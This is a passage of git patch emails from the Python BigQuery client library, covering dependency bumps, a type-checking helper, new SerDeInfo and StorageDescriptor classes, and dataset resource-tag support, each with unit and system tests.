b/.kokoro/docker/docs/requirements.txt @@ -66,7 +66,7 @@ tomli==2.2.1 \ --hash=sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a \ --hash=sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7 # via nox -virtualenv==20.28.0 \ - --hash=sha256:23eae1b4516ecd610481eda647f3a7c09aea295055337331bb4e6892ecce47b0 \ - --hash=sha256:2c9c3262bb8e7b87ea801d715fae4495e6032450c71d2309be9550e7364049aa +virtualenv==20.28.1 \ + --hash=sha256:412773c85d4dab0409b83ec36f7a6499e72eaf08c80e81e9576bca61831c71cb \ + --hash=sha256:5d34ab240fdb5d21549b76f9e8ff3af28252f5499fb6d6f031adac4e5a8c5329 # via nox From 473c3c30ef5201154c295c41ae9d8a25435a9b3f Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 7 Jan 2025 00:17:03 +0100 Subject: [PATCH 045/202] chore(deps): update dependency grpcio to v1.69.0 (#2102) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index ab73dbe87..71579867f 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -25,7 +25,7 @@ google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.66.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.68.1; python_version >= '3.8' +grpcio==1.69.0; python_version >= '3.8' idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 From b35d741fe564ac106b2bf9d033b08d808b114363 Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Thu, 9 Jan 2025 10:00:45 -0500 Subject: [PATCH 046/202] chore(python): exclude .github/workflows/unittest.yml in renovate config (#2103) Source-Link: https://github.com/googleapis/synthtool/commit/106d292bd234e5d9977231dcfbc4831e34eba13a Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:8ff1efe878e18bd82a0fb7b70bb86f77e7ab6901fed394440b6135db0ba8d84a Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 6 +++--- .kokoro/docker/docs/requirements.txt | 12 ++++++------ renovate.json | 2 +- 3 files changed, 10 insertions(+), 10 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 26306af66..10cf433a8 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -1,4 +1,4 @@ -# Copyright 2024 Google LLC +# Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:8e3e7e18255c22d1489258d0374c901c01f9c4fd77a12088670cd73d580aa737 -# created: 2024-12-17T00:59:58.625514486Z + digest: sha256:8ff1efe878e18bd82a0fb7b70bb86f77e7ab6901fed394440b6135db0ba8d84a +# created: 2025-01-09T12:01:16.422459506Z diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index 48ace5de9..f99a5c4aa 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -4,9 +4,9 @@ # # pip-compile --allow-unsafe --generate-hashes synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in # -argcomplete==3.5.3 \ - --hash=sha256:2ab2c4a215c59fd6caaff41a869480a23e8f6a5f910b266c1808037f4e375b61 \ - --hash=sha256:c12bf50eded8aebb298c7b7da7a5ff3ee24dffd9f5281867dfe1424b58c55392 +argcomplete==3.5.2 \ + --hash=sha256:036d020d79048a5d525bc63880d7a4b8d1668566b8a76daf1144c0bbe0f63472 \ + --hash=sha256:23146ed7ac4403b70bd6026402468942ceba34a6732255b9edf5b7354f68a6bb # via nox colorlog==6.9.0 \ --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ @@ -66,7 +66,7 @@ tomli==2.2.1 \ --hash=sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a \ --hash=sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7 # via nox -virtualenv==20.28.1 \ - --hash=sha256:412773c85d4dab0409b83ec36f7a6499e72eaf08c80e81e9576bca61831c71cb \ - --hash=sha256:5d34ab240fdb5d21549b76f9e8ff3af28252f5499fb6d6f031adac4e5a8c5329 +virtualenv==20.28.0 \ + --hash=sha256:23eae1b4516ecd610481eda647f3a7c09aea295055337331bb4e6892ecce47b0 \ + --hash=sha256:2c9c3262bb8e7b87ea801d715fae4495e6032450c71d2309be9550e7364049aa # via nox diff --git a/renovate.json b/renovate.json index 39b2a0ec9..c7875c469 100644 --- a/renovate.json +++ b/renovate.json @@ -5,7 +5,7 @@ ":preserveSemverRanges", ":disableDependencyDashboard" ], - "ignorePaths": [".pre-commit-config.yaml", ".kokoro/requirements.txt", "setup.py"], + "ignorePaths": [".pre-commit-config.yaml", ".kokoro/requirements.txt", "setup.py", ".github/workflows/unittest.yml"], "pip_requirements": { "fileMatch": ["requirements-test.txt", "samples/[\\S/]*constraints.txt", "samples/[\\S/]*constraints-test.txt"] } From a2bebb95c5ef32ac7c7cbe19c3e7a9412cbee60d Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 9 Jan 2025 13:42:37 -0500 Subject: [PATCH 047/202] feat: adds new input validation function similar to isinstance. (#2107) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: adds new function similar to isinstance. * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- google/cloud/bigquery/_helpers.py | 32 ++++++++++++++++++++++++++++++- tests/unit/test__helpers.py | 32 +++++++++++++++++++++++++++++++ 2 files changed, 63 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index 1eda80712..ea47af28d 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -22,7 +22,7 @@ import re import os import warnings -from typing import Optional, Union +from typing import Optional, Union, Any, Tuple, Type from dateutil import relativedelta from google.cloud._helpers import UTC # type: ignore @@ -1004,3 +1004,33 @@ def _verify_job_config_type(job_config, expected_type, param_name="job_config"): job_config=job_config, ) ) + + +def _isinstance_or_raise( + value: Any, + dtype: Union[Type, Tuple[Type, ...]], + none_allowed: Optional[bool] = False, +) -> Any: + """Determine whether a value type matches a given datatype or None. + Args: + value (Any): Value to be checked. + dtype (type): Expected data type or tuple of data types. + none_allowed Optional(bool): whether value is allowed to be None. Default + is False. + Returns: + Any: Returns the input value if the type check is successful. + Raises: + TypeError: If the input value's type does not match the expected data type(s). + """ + if none_allowed and value is None: + return value + + if isinstance(value, dtype): + return value + + or_none = "" + if none_allowed: + or_none = " (or None)" + + msg = f"Pass {value} as a '{dtype}'{or_none}. Got {type(value)}." + raise TypeError(msg) diff --git a/tests/unit/test__helpers.py b/tests/unit/test__helpers.py index 0a307498f..adba6327c 100644 --- a/tests/unit/test__helpers.py +++ b/tests/unit/test__helpers.py @@ -24,6 +24,7 @@ from unittest import mock import google.api_core +from google.cloud.bigquery._helpers import _isinstance_or_raise @pytest.mark.skipif( @@ -1661,3 +1662,34 @@ def test_w_env_var(self): host = self._call_fut() self.assertEqual(host, HOST) + + +class Test__isinstance_or_raise: + @pytest.mark.parametrize( + "value,dtype,none_allowed,expected", + [ + (None, str, True, None), + ("hello world.uri", str, True, "hello world.uri"), + ("hello world.uri", str, False, "hello world.uri"), + (None, (str, float), True, None), + ("hello world.uri", (str, float), True, "hello world.uri"), + ("hello world.uri", (str, float), False, "hello world.uri"), + ], + ) + def test__valid_isinstance_or_raise(self, value, dtype, none_allowed, expected): + result = _isinstance_or_raise(value, dtype, none_allowed=none_allowed) + assert result == expected + + @pytest.mark.parametrize( + "value,dtype,none_allowed,expected", + [ + (None, str, False, pytest.raises(TypeError)), + ({"key": "value"}, str, True, pytest.raises(TypeError)), + ({"key": "value"}, str, False, pytest.raises(TypeError)), + ({"key": "value"}, (str, float), True, pytest.raises(TypeError)), + ({"key": "value"}, (str, float), False, pytest.raises(TypeError)), + ], + ) + def test__invalid_isinstance_or_raise(self, value, dtype, none_allowed, expected): + with expected: + _isinstance_or_raise(value, dtype, none_allowed=none_allowed) From 62960f255d05b15940a8d2cdc595592175fada11 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 10 Jan 2025 13:22:06 -0500 Subject: [PATCH 048/202] feat: adds the SerDeInfo class and tests (#2108) * feat: adds SerDeInfo class and tests * cleans up type hints and some minor tweaks --- google/cloud/bigquery/schema.py | 88 +++++++++++++++++++++++++++++++ tests/unit/test_schema.py | 92 +++++++++++++++++++++++++++++++-- 2 files changed, 176 insertions(+), 4 deletions(-) diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index b062396cf..f93877d45 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -14,8 +14,10 @@ """Schemas for BigQuery tables / queries.""" +from __future__ import annotations import collections import enum +import typing from typing import Any, cast, Dict, Iterable, Optional, Union from google.cloud.bigquery import _helpers @@ -556,3 +558,89 @@ def to_api_repr(self) -> dict: """ answer = {"names": list(self.names)} return answer + + +class SerDeInfo: + """Serializer and deserializer information. + + Args: + serialization_library (str): Required. Specifies a fully-qualified class + name of the serialization library that is responsible for the + translation of data between table representation and the underlying + low-level input and output format structures. The maximum length is + 256 characters. + name (Optional[str]): Name of the SerDe. The maximum length is 256 + characters. + parameters: (Optional[dict[str, str]]): Key-value pairs that define the initialization + parameters for the serialization library. Maximum size 10 Kib. + """ + + def __init__( + self, + serialization_library: str, + name: Optional[str] = None, + parameters: Optional[dict[str, str]] = None, + ): + self._properties: Dict[str, Any] = {} + self.serialization_library = serialization_library + self.name = name + self.parameters = parameters + + @property + def serialization_library(self) -> str: + """Required. Specifies a fully-qualified class name of the serialization + library that is responsible for the translation of data between table + representation and the underlying low-level input and output format + structures. The maximum length is 256 characters.""" + + return typing.cast(str, self._properties.get("serializationLibrary")) + + @serialization_library.setter + def serialization_library(self, value: str): + value = _helpers._isinstance_or_raise(value, str, none_allowed=False) + self._properties["serializationLibrary"] = value + + @property + def name(self) -> Optional[str]: + """Optional. Name of the SerDe. The maximum length is 256 characters.""" + + return self._properties.get("name") + + @name.setter + def name(self, value: Optional[str] = None): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["name"] = value + + @property + def parameters(self) -> Optional[dict[str, str]]: + """Optional. Key-value pairs that define the initialization parameters + for the serialization library. Maximum size 10 Kib.""" + + return self._properties.get("parameters") + + @parameters.setter + def parameters(self, value: Optional[dict[str, str]] = None): + value = _helpers._isinstance_or_raise(value, dict, none_allowed=True) + self._properties["parameters"] = value + + def to_api_repr(self) -> dict: + """Build an API representation of this object. + Returns: + Dict[str, Any]: + A dictionary in the format used by the BigQuery API. + """ + return self._properties + + @classmethod + def from_api_repr(cls, api_repr: dict) -> SerDeInfo: + """Factory: constructs an instance of the class (cls) + given its API representation. + Args: + resource (Dict[str, Any]): + API representation of the object to be instantiated. + Returns: + An instance of the class initialized with data from 'resource'. + """ + config = cls("PLACEHOLDER") + config._properties = api_repr + return config diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index 4b0b28158..380067dc8 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -20,6 +20,7 @@ from google.cloud import bigquery from google.cloud.bigquery.standard_sql import StandardSqlStructType +from google.cloud.bigquery import schema from google.cloud.bigquery.schema import PolicyTagList @@ -130,8 +131,6 @@ def test_constructor_range_str(self): self.assertEqual(field.range_element_type.element_type, "DATETIME") def test_to_api_repr(self): - from google.cloud.bigquery.schema import PolicyTagList - policy = PolicyTagList(names=("foo", "bar")) self.assertEqual( policy.to_api_repr(), @@ -886,8 +885,6 @@ def test_valid_mapping_representation(self): class TestPolicyTags(unittest.TestCase): @staticmethod def _get_target_class(): - from google.cloud.bigquery.schema import PolicyTagList - return PolicyTagList def _make_one(self, *args, **kw): @@ -1129,3 +1126,90 @@ def test_to_api_repr_parameterized(field, api): from google.cloud.bigquery.schema import SchemaField assert SchemaField(**field).to_api_repr() == api + + +class TestSerDeInfo: + """Tests for the SerDeInfo class.""" + + @staticmethod + def _get_target_class(): + return schema.SerDeInfo + + def _make_one(self, *args, **kwargs): + return self._get_target_class()(*args, **kwargs) + + @pytest.mark.parametrize( + "serialization_library,name,parameters", + [ + ("testpath.to.LazySimpleSerDe", None, None), + ("testpath.to.LazySimpleSerDe", "serde_name", None), + ("testpath.to.LazySimpleSerDe", None, {"key": "value"}), + ("testpath.to.LazySimpleSerDe", "serde_name", {"key": "value"}), + ], + ) + def test_ctor_valid_input(self, serialization_library, name, parameters): + serde_info = self._make_one( + serialization_library=serialization_library, + name=name, + parameters=parameters, + ) + assert serde_info.serialization_library == serialization_library + assert serde_info.name == name + assert serde_info.parameters == parameters + + @pytest.mark.parametrize( + "serialization_library,name,parameters", + [ + (123, None, None), + ("testpath.to.LazySimpleSerDe", 123, None), + ("testpath.to.LazySimpleSerDe", None, ["test", "list"]), + ("testpath.to.LazySimpleSerDe", None, 123), + ], + ) + def test_ctor_invalid_input(self, serialization_library, name, parameters): + with pytest.raises(TypeError) as e: + self._make_one( + serialization_library=serialization_library, + name=name, + parameters=parameters, + ) + # Looking for the first word from the string "Pass as..." + assert "Pass " in str(e.value) + + def test_to_api_repr(self): + serde_info = self._make_one( + serialization_library="testpath.to.LazySimpleSerDe", + name="serde_name", + parameters={"key": "value"}, + ) + expected_repr = { + "serializationLibrary": "testpath.to.LazySimpleSerDe", + "name": "serde_name", + "parameters": {"key": "value"}, + } + assert serde_info.to_api_repr() == expected_repr + + def test_from_api_repr(self): + """GIVEN an api representation of a SerDeInfo object (i.e. resource) + WHEN converted into a SerDeInfo object using from_api_repr() + THEN it will have the representation in dict format as a SerDeInfo + object made directly (via _make_one()) and represented in dict format. + """ + api_repr = { + "serializationLibrary": "testpath.to.LazySimpleSerDe", + "name": "serde_name", + "parameters": {"key": "value"}, + } + + expected = self._make_one( + serialization_library="testpath.to.LazySimpleSerDe", + name="serde_name", + parameters={"key": "value"}, + ) + + klass = self._get_target_class() + result = klass.from_api_repr(api_repr) + + # We convert both to dict format because these classes do not have a + # __eq__() method to facilitate direct equality comparisons. + assert result.to_api_repr() == expected.to_api_repr() From 6be0272ff25dac97a38ae4ee5aa02016dc82a0d8 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 14 Jan 2025 15:48:57 -0500 Subject: [PATCH 049/202] feat: adds StorageDescriptor and tests (#2109) * feat: adds StorageDescriptor and tests * updates attr names, corrects type hinting --- google/cloud/bigquery/schema.py | 118 +++++++++++++++++++++++++++++ tests/unit/test_schema.py | 128 ++++++++++++++++++++++++++++++++ 2 files changed, 246 insertions(+) diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index f93877d45..8d62b2b5b 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -644,3 +644,121 @@ def from_api_repr(cls, api_repr: dict) -> SerDeInfo: config = cls("PLACEHOLDER") config._properties = api_repr return config + + +class StorageDescriptor: + """Contains information about how a table's data is stored and accessed by open + source query engines. + + Args: + input_format (Optional[str]): Specifies the fully qualified class name of + the InputFormat (e.g. + "org.apache.hadoop.hive.ql.io.orc.OrcInputFormat"). The maximum + length is 128 characters. + location_uri (Optional[str]): The physical location of the table (e.g. + 'gs://spark-dataproc-data/pangea-data/case_sensitive/' or + 'gs://spark-dataproc-data/pangea-data/'). The maximum length is + 2056 bytes. + output_format (Optional[str]): Specifies the fully qualified class name + of the OutputFormat (e.g. + "org.apache.hadoop.hive.ql.io.orc.OrcOutputFormat"). The maximum + length is 128 characters. + serde_info (Union[SerDeInfo, dict, None]): Serializer and deserializer information. + """ + + def __init__( + self, + input_format: Optional[str] = None, + location_uri: Optional[str] = None, + output_format: Optional[str] = None, + serde_info: Union[SerDeInfo, dict, None] = None, + ): + self._properties: Dict[str, Any] = {} + self.input_format = input_format + self.location_uri = location_uri + self.output_format = output_format + # Using typing.cast() because mypy cannot wrap it's head around the fact that: + # the setter can accept Union[SerDeInfo, dict, None] + # but the getter will only ever return Optional[SerDeInfo]. + self.serde_info = typing.cast(Optional[SerDeInfo], serde_info) + + @property + def input_format(self) -> Optional[str]: + """Optional. Specifies the fully qualified class name of the InputFormat + (e.g. "org.apache.hadoop.hive.ql.io.orc.OrcInputFormat"). The maximum + length is 128 characters.""" + + return self._properties.get("inputFormat") + + @input_format.setter + def input_format(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["inputFormat"] = value + + @property + def location_uri(self) -> Optional[str]: + """Optional. The physical location of the table (e.g. 'gs://spark- + dataproc-data/pangea-data/case_sensitive/' or 'gs://spark-dataproc- + data/pangea-data/'). The maximum length is 2056 bytes.""" + + return self._properties.get("locationUri") + + @location_uri.setter + def location_uri(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["locationUri"] = value + + @property + def output_format(self) -> Optional[str]: + """Optional. Specifies the fully qualified class name of the + OutputFormat (e.g. "org.apache.hadoop.hive.ql.io.orc.OrcOutputFormat"). + The maximum length is 128 characters.""" + + return self._properties.get("outputFormat") + + @output_format.setter + def output_format(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["outputFormat"] = value + + @property + def serde_info(self) -> Optional[SerDeInfo]: + """Optional. Serializer and deserializer information.""" + + prop = _helpers._get_sub_prop(self._properties, ["serDeInfo"]) + if prop is not None: + return typing.cast(SerDeInfo, SerDeInfo.from_api_repr(prop)) + return None + + @serde_info.setter + def serde_info(self, value: Union[SerDeInfo, dict, None]): + value = _helpers._isinstance_or_raise( + value, (SerDeInfo, dict), none_allowed=True + ) + + if isinstance(value, SerDeInfo): + self._properties["serDeInfo"] = value.to_api_repr() + else: + self._properties["serDeInfo"] = value + + def to_api_repr(self) -> dict: + """Build an API representation of this object. + Returns: + Dict[str, Any]: + A dictionary in the format used by the BigQuery API. + """ + return self._properties + + @classmethod + def from_api_repr(cls, resource: dict) -> StorageDescriptor: + """Factory: constructs an instance of the class (cls) + given its API representation. + Args: + resource (Dict[str, Any]): + API representation of the object to be instantiated. + Returns: + An instance of the class initialized with data from 'resource'. + """ + config = cls() + config._properties = resource + return config diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index 380067dc8..7e84dd63f 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -1213,3 +1213,131 @@ def test_from_api_repr(self): # We convert both to dict format because these classes do not have a # __eq__() method to facilitate direct equality comparisons. assert result.to_api_repr() == expected.to_api_repr() + + +class TestStorageDescriptor: + """Tests for the StorageDescriptor class.""" + + @staticmethod + def _get_target_class(): + return schema.StorageDescriptor + + def _make_one(self, *args, **kwargs): + return self._get_target_class()(*args, **kwargs) + + serdeinfo_resource = { + "serialization_library": "testpath.to.LazySimpleSerDe", + "name": "serde_lib_name", + "parameters": {"key": "value"}, + } + + SERDEINFO = schema.SerDeInfo("PLACEHOLDER").from_api_repr(serdeinfo_resource) + + STORAGEDESCRIPTOR = { + "inputFormat": "testpath.to.OrcInputFormat", + "locationUri": "gs://test/path/", + "outputFormat": "testpath.to.OrcOutputFormat", + "serDeInfo": SERDEINFO.to_api_repr(), + } + + @pytest.mark.parametrize( + "input_format,location_uri,output_format,serde_info", + [ + (None, None, None, None), + ("testpath.to.OrcInputFormat", None, None, None), + (None, "gs://test/path/", None, None), + (None, None, "testpath.to.OrcOutputFormat", None), + (None, None, None, SERDEINFO), + ( + "testpath.to.OrcInputFormat", + "gs://test/path/", + "testpath.to.OrcOutputFormat", + SERDEINFO, # uses SERDEINFO class format + ), + ( + "testpath.to.OrcInputFormat", + "gs://test/path/", + "testpath.to.OrcOutputFormat", + serdeinfo_resource, # uses api resource format (dict) + ), + ], + ) + def test_ctor_valid_input( + self, input_format, location_uri, output_format, serde_info + ): + storage_descriptor = self._make_one( + input_format=input_format, + location_uri=location_uri, + output_format=output_format, + serde_info=serde_info, + ) + assert storage_descriptor.input_format == input_format + assert storage_descriptor.location_uri == location_uri + assert storage_descriptor.output_format == output_format + if isinstance(serde_info, schema.SerDeInfo): + assert ( + storage_descriptor.serde_info.to_api_repr() == serde_info.to_api_repr() + ) + elif isinstance(serde_info, dict): + assert storage_descriptor.serde_info.to_api_repr() == serde_info + else: + assert storage_descriptor.serde_info is None + + @pytest.mark.parametrize( + "input_format,location_uri,output_format,serde_info", + [ + (123, None, None, None), + (None, 123, None, None), + (None, None, 123, None), + (None, None, None, 123), + ], + ) + def test_ctor_invalid_input( + self, input_format, location_uri, output_format, serde_info + ): + with pytest.raises(TypeError) as e: + self._make_one( + input_format=input_format, + location_uri=location_uri, + output_format=output_format, + serde_info=serde_info, + ) + + # Looking for the first word from the string "Pass as..." + assert "Pass " in str(e.value) + + def test_to_api_repr(self): + storage_descriptor = self._make_one( + input_format="input_format", + location_uri="location_uri", + output_format="output_format", + serde_info=self.SERDEINFO, + ) + expected_repr = { + "inputFormat": "input_format", + "locationUri": "location_uri", + "outputFormat": "output_format", + "serDeInfo": self.SERDEINFO.to_api_repr(), + } + assert storage_descriptor.to_api_repr() == expected_repr + + def test_from_api_repr(self): + """GIVEN an api representation of a StorageDescriptor (i.e. STORAGEDESCRIPTOR) + WHEN converted into a StorageDescriptor using from_api_repr() and + displayed as a dict + THEN it will have the same representation a StorageDescriptor created + directly (via the _make_one() func) and displayed as a dict. + """ + + # generate via STORAGEDESCRIPTOR + resource = self.STORAGEDESCRIPTOR + result = self._get_target_class().from_api_repr(resource) + # result = klass.from_api_repr(resource) + + expected = self._make_one( + input_format="testpath.to.OrcInputFormat", + location_uri="gs://test/path/", + output_format="testpath.to.OrcOutputFormat", + serde_info=self.SERDEINFO, + ) + assert result.to_api_repr() == expected.to_api_repr() From 3e130166f43dcc06704fe90edf9068dfd44842a6 Mon Sep 17 00:00:00 2001 From: Keunsoo Park <43742836+keunsoopark@users.noreply.github.com> Date: Tue, 14 Jan 2025 22:17:13 +0100 Subject: [PATCH 050/202] feat: resource tags in dataset (#2090) * feat: resource tags in dataset * fix: fix unittets * Delete dataset/pyvenv.cfg * Update google/cloud/bigquery/dataset.py Co-authored-by: Lingqing Gan * Update google/cloud/bigquery/dataset.py Co-authored-by: Lingqing Gan * added system tests & fix unittest for none * add missing assert * remove venv * include resourcemanager in noxfile.py * fix fixture for tag keys * register tags before using in tests * handle alreadyexist error * fix: tag keys & values creation & deletion * fix comment * make tag keys unique * remove unused import --------- Co-authored-by: Lingqing Gan --- google/cloud/bigquery/dataset.py | 23 ++++++++ noxfile.py | 4 ++ tests/system/test_client.py | 90 ++++++++++++++++++++++++++++++- tests/unit/test_client.py | 6 +++ tests/unit/test_create_dataset.py | 5 ++ tests/unit/test_dataset.py | 22 ++++++++ 6 files changed, 148 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index c49a52faf..4d06d729d 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -530,6 +530,7 @@ class Dataset(object): "storage_billing_model": "storageBillingModel", "max_time_travel_hours": "maxTimeTravelHours", "default_rounding_mode": "defaultRoundingMode", + "resource_tags": "resourceTags", } def __init__(self, dataset_ref) -> None: @@ -801,6 +802,28 @@ def labels(self, value): raise ValueError("Pass a dict") self._properties["labels"] = value + @property + def resource_tags(self): + """Dict[str, str]: Resource tags of the dataset. + + Optional. The tags attached to this dataset. Tag keys are globally + unique. Tag key is expected to be in the namespaced format, for + example "123456789012/environment" where 123456789012 is + the ID of the parent organization or project resource for this tag + key. Tag value is expected to be the short name, for example + "Production". + + Raises: + ValueError: for invalid value types. + """ + return self._properties.setdefault("resourceTags", {}) + + @resource_tags.setter + def resource_tags(self, value): + if not isinstance(value, dict) and value is not None: + raise ValueError("Pass a dict") + self._properties["resourceTags"] = value + @property def default_encryption_configuration(self): """google.cloud.bigquery.encryption_configuration.EncryptionConfiguration: Custom diff --git a/noxfile.py b/noxfile.py index 750a6b459..e08956b11 100644 --- a/noxfile.py +++ b/noxfile.py @@ -219,6 +219,9 @@ def system(session): # Data Catalog needed for the column ACL test with a real Policy Tag. session.install("google-cloud-datacatalog", "-c", constraints_path) + # Resource Manager needed for test with a real Resource Tag. + session.install("google-cloud-resource-manager", "-c", constraints_path) + if session.python in ["3.11", "3.12"]: extras = "[bqstorage,ipywidgets,pandas,tqdm,opentelemetry]" else: @@ -366,6 +369,7 @@ def prerelease_deps(session): session.install( "freezegun", "google-cloud-datacatalog", + "google-cloud-resource-manager", "google-cloud-storage", "google-cloud-testutils", "psutil", diff --git a/tests/system/test_client.py b/tests/system/test_client.py index 95c679a14..c0dd83b12 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -25,6 +25,8 @@ import time import unittest import uuid +import random +import string from typing import Optional from google.api_core.exceptions import PreconditionFailed @@ -45,6 +47,8 @@ from google.cloud import storage from google.cloud.datacatalog_v1 import types as datacatalog_types from google.cloud.datacatalog_v1 import PolicyTagManagerClient +from google.cloud.resourcemanager_v3 import types as resourcemanager_types +from google.cloud.resourcemanager_v3 import TagKeysClient, TagValuesClient import psutil import pytest from test_utils.retry import RetryErrors @@ -156,9 +160,12 @@ def setUpModule(): class TestBigQuery(unittest.TestCase): def setUp(self): self.to_delete = [] + self.to_delete_tag_keys_values = [] def tearDown(self): policy_tag_client = PolicyTagManagerClient() + tag_keys_client = TagKeysClient() + tag_values_client = TagValuesClient() def _still_in_use(bad_request): return any( @@ -181,6 +188,18 @@ def _still_in_use(bad_request): else: doomed.delete() + # The TagKey cannot be deleted if it has any child TagValues. + for key_values in self.to_delete_tag_keys_values: + tag_key = key_values.pop() + + # Delete tag values first + [ + tag_values_client.delete_tag_value(name=tag_value.name).result() + for tag_value in key_values + ] + + tag_keys_client.delete_tag_key(name=tag_key.name).result() + def test_get_service_account_email(self): client = Config.CLIENT @@ -278,24 +297,74 @@ def test_create_dataset_with_default_rounding_mode(self): self.assertTrue(_dataset_exists(dataset)) self.assertEqual(dataset.default_rounding_mode, "ROUND_HALF_EVEN") + def _create_resource_tag_key_and_values(self, key, values): + tag_key_client = TagKeysClient() + tag_value_client = TagValuesClient() + + tag_key_parent = f"projects/{Config.CLIENT.project}" + new_tag_key = resourcemanager_types.TagKey( + short_name=key, parent=tag_key_parent + ) + tag_key = tag_key_client.create_tag_key(tag_key=new_tag_key).result() + self.to_delete_tag_keys_values.insert(0, [tag_key]) + + for value in values: + new_tag_value = resourcemanager_types.TagValue( + short_name=value, parent=tag_key.name + ) + tag_value = tag_value_client.create_tag_value( + tag_value=new_tag_value + ).result() + self.to_delete_tag_keys_values[0].insert(0, tag_value) + def test_update_dataset(self): dataset = self.temp_dataset(_make_dataset_id("update_dataset")) self.assertTrue(_dataset_exists(dataset)) self.assertIsNone(dataset.friendly_name) self.assertIsNone(dataset.description) self.assertEqual(dataset.labels, {}) + self.assertEqual(dataset.resource_tags, {}) self.assertIs(dataset.is_case_insensitive, False) + # This creates unique tag keys for each of test runnings for different Python versions + tag_postfix = "".join(random.choices(string.ascii_letters + string.digits, k=4)) + tag_1 = f"env_{tag_postfix}" + tag_2 = f"component_{tag_postfix}" + tag_3 = f"project_{tag_postfix}" + + # Tags need to be created before they can be used in a dataset. + self._create_resource_tag_key_and_values(tag_1, ["prod", "dev"]) + self._create_resource_tag_key_and_values(tag_2, ["batch"]) + self._create_resource_tag_key_and_values(tag_3, ["atlas"]) + dataset.friendly_name = "Friendly" dataset.description = "Description" dataset.labels = {"priority": "high", "color": "blue"} + dataset.resource_tags = { + f"{Config.CLIENT.project}/{tag_1}": "prod", + f"{Config.CLIENT.project}/{tag_2}": "batch", + } dataset.is_case_insensitive = True ds2 = Config.CLIENT.update_dataset( - dataset, ("friendly_name", "description", "labels", "is_case_insensitive") + dataset, + ( + "friendly_name", + "description", + "labels", + "resource_tags", + "is_case_insensitive", + ), ) self.assertEqual(ds2.friendly_name, "Friendly") self.assertEqual(ds2.description, "Description") self.assertEqual(ds2.labels, {"priority": "high", "color": "blue"}) + self.assertEqual( + ds2.resource_tags, + { + f"{Config.CLIENT.project}/{tag_1}": "prod", + f"{Config.CLIENT.project}/{tag_2}": "batch", + }, + ) self.assertIs(ds2.is_case_insensitive, True) ds2.labels = { @@ -303,8 +372,25 @@ def test_update_dataset(self): "shape": "circle", # add "priority": None, # delete } - ds3 = Config.CLIENT.update_dataset(ds2, ["labels"]) + ds2.resource_tags = { + f"{Config.CLIENT.project}/{tag_1}": "dev", # change + f"{Config.CLIENT.project}/{tag_3}": "atlas", # add + f"{Config.CLIENT.project}/{tag_2}": None, # delete + } + ds3 = Config.CLIENT.update_dataset(ds2, ["labels", "resource_tags"]) self.assertEqual(ds3.labels, {"color": "green", "shape": "circle"}) + self.assertEqual( + ds3.resource_tags, + { + f"{Config.CLIENT.project}/{tag_1}": "dev", + f"{Config.CLIENT.project}/{tag_3}": "atlas", + }, + ) + + # Remove all tags + ds3.resource_tags = None + ds4 = Config.CLIENT.update_dataset(ds3, ["resource_tags"]) + 